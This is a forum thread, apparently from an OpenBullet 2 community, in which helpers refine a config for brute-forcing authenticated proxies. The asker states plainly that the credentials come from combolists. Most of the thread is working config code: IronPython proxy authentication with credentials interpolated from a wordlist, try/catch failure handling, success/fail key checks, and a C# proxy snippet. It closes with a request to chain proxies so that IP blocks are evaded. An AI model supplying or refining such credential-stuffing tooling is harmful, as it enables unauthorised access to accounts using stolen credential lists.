USER/PASS VARIABLE not able to be used in IronPython using HTTP Requests?

Here’s the code.

BLOCK:Script
INTERPRETER:IronPython
INPUT input.USERNAME
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': 'http://input.USERNAME:input.PASSWORD@privateip:8080'})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
ENDBLOCK

The following works fine when typing in the actuall user instead of the user variable.

proxy = urllib2.ProxyHandler({'http': 'http://myusername:mypassword@myip:8080'})

When using the variables I get: [Executing block Script] Exception: HTTPError
Meaning the AUTH failed, so user/pass not being used ?

Am I missing something?

You cannot pass input.USERNAME to a script directly because it has a dot in the name so it cannot declare a variable with the same name in the script.

Please copy the value of input.USERNAME to a different variable first (e.g. using the constant string block) and then use that one. For example call it just USERNAME.

After that, you will need to search how to interpolate strings in python, and put the variable USERNAME in the correct place in your proxy string. You NEED to do this otherwise it will not replace any value.

1 Like

I’m not familair with Python or any programming language.
I found this on Google and made it work for my case.
But I have no clue on how to interpolate it.
I found stuff on Google but cant make anything from it lol.

BLOCK:ConstantString
  value = @input.USERNAME
  SAFE
  => VAR @newUSER
ENDBLOCK

BLOCK:Script
INTERPRETER:IronPython
INPUT newUSER
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': 'http://newUSER:newPASS@privateip:8080'})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
ENDBLOCK

I basically want to brute force proxies using my own email:pass from combolists.

I fixed the inputs and interpolation

BLOCK:ConstantString
  value = @input.USERNAME
  => VAR @newUSER
ENDBLOCK

BLOCK:ConstantString
  value = @input.PASSWORD
  => VAR @newPASS
ENDBLOCK

BLOCK:Script
INTERPRETER:IronPython
INPUT newUSER,newPASS
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': f'http://{newUSER}:{newPASS}@privateip:8080'})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
ENDBLOCK

By the way, just wanted to say that you can do the same with OB2 itself, no need to use python in this case it just makes it slower.

1 Like

Thanks for your help Ruri, but its still sending as user:pass instead of the actuall user pass
Also, your code contained f’http:// which gave me an syntax error :stuck_out_tongue:

GET http://scratchpads.org/explore/sites-list HTTP/1.1
Proxy-Authorization: Basic e25ld1VTRVJ9OntuZXdQQVNTfQ==
Host: scratchpads.org
User-Agent: Python-urllib/2.7
Connection: close
Accept-Encoding: identity


e25ld1VTRVJ9OntuZXdQQVNTfQ==
is {newUSER}:{newPASS}

I have no clue how to do this in OB2 without python, because for HTTP Request, theres only the global proxy from OB2 itself, not one set within the request.
I want to bruteforce proxies, and not “use” them.
Hope you understand what I mean haha

1 Like

Ah yes sorry I forgot that’s the string interpolation in py3 but IronPython in OB2 is py2, so it would be something like this (please, search online for the correct syntax I don’t know python)

BLOCK:ConstantString
  value = @input.USERNAME
  => VAR @newUSER
ENDBLOCK

BLOCK:ConstantString
  value = @input.PASSWORD
  => VAR @newPASS
ENDBLOCK

BLOCK:Script
INTERPRETER:IronPython
INPUT newUSER,newPASS
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': "http://%s:%s@privateip:8080"%(newUSER, newPASS)})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
ENDBLOCK

Its working!
Thanks a bunch Ruri !

Now, when I am using invalid credentials it returns “[Executing block Script] Exception: HTTPError”
Any way to make this specific error a failurekey ?

Use try/catch either inside the script (search the python way to do it, I think it’s try/except) or in C# directly (around the script block).

How would I got about doing that in C# ?
Right now, I have this [but its not working]:

BLOCK:ConstantString
  value = @input.USERNAME
  => VAR @newUSER
ENDBLOCK

BLOCK:ConstantString
  value = @input.PASSWORD
  => VAR @newPASS
ENDBLOCK

BLOCK:Script
INTERPRETER:IronPython
INPUT newUSER,newPASS
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': "http://%s:%s@privateip:8080"%(newUSER, newPASS)})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
OUTPUT String @e
ENDBLOCK
try
{
    // put the code here that may raise exceptions
}
catch
{
    // handle exception here
}
finally
{
    // final cleanup code
}

BLOCK:Keycheck
  KEYCHAIN SUCCESS OR
    STRINGKEY @html Contains "head"
  KEYCHAIN FAIL OR
    STRINGKEY @data.ERROR EqualTo "ERROR"
ENDBLOCK

BLOCK:ConstantString
  value = @input.USERNAME
  => VAR @newUSER
ENDBLOCK

BLOCK:ConstantString
  value = @input.PASSWORD
  => VAR @newPASS
ENDBLOCK

try {
BLOCK:Script
INTERPRETER:IronPython
INPUT newUSER,newPASS
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': "http://%s:%s@privateip:8080"%(newUSER, newPASS)})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
OUTPUT String @e
ENDBLOCK
} catch(Exception ex) { data.ERROR = ex.Message; }

BLOCK:Keycheck
  KEYCHAIN SUCCESS OR
    STRINGKEY @html Contains "head"
  KEYCHAIN FAIL OR
    STRINGKEY @data.ERROR Contains "Exception"
ENDBLOCK
1 Like

Works great, thanks!
I remember you saying, this can be done within OB2 without python.
If so, how ?

Its really slow, even with 50 bots currently.

You can use TCP Connect blocks to connect to the proxy(s) and check if auth failed or not.

I don’t have time now, contact me in a few days and I will give you a snippet

This is a reminder as requested by @Ruri =)

data.UseProxy = true;
data.Proxy = new RuriLib.Models.Proxies.Proxy(
    "privateip", // Put the IP here
    8080, // This is the port
    RuriLib.Models.Proxies.ProxyType.Http, // You can put Http, Socks4 or Socks5
    input.USERNAME, // The username from the wordlist
    input.PASSWORD); // The password from the wordlist

// The following request will be done via that proxy.
// If the proxy works it will have Example in the response, otherwise if
// there is an error the proxy doesn't work (wrong credentials).

TRY
BLOCK:HttpRequest
  url = "https://example.com"
  TYPE:STANDARD
  $""
  "application/x-www-form-urlencoded"
ENDBLOCK
CATCH
data.STATUS = "FAIL";
return;
END

BLOCK:Keycheck
  KEYCHAIN FAIL OR
    STRINGKEY @data.SOURCE DoesNotContain "Example"
  KEYCHAIN SUCCESS OR
    STRINGKEY @data.SOURCE Contains "Example"
ENDBLOCK
2 Likes

Thanks bro, works great!
PS: Sorry for late response :frowning:

Hi,

I was wondering if there’s a way to use proxies to brute-force proxies ?
Right now I am using a VPN, and switching IP’s is not ideal lol.
I remember something called Chain-Proxies, but I couldn’t find anything about it for OB2.